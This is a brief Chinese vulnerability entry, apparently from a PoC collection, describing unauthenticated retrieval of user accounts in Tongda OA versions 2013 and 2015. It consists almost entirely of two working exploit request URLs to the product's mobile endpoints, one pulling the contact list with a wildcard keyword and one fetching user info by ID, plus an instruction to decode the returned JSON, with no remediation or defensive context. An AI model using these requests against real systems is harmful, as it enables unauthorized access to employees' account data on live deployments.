通达oa 未授权获取帐号

通达oa 未授权获取帐号¶

漏洞影响¶

2013、2015版本

复现过程¶

PoC

http://url/mobile/inc/get_contactlist.php?P=1&KWORD=%&isuser_info=3

http://url/mobile/user_info/data.php?P=1&ATYPE=getUserInfo&Q_ID=50

将返回的json进行解码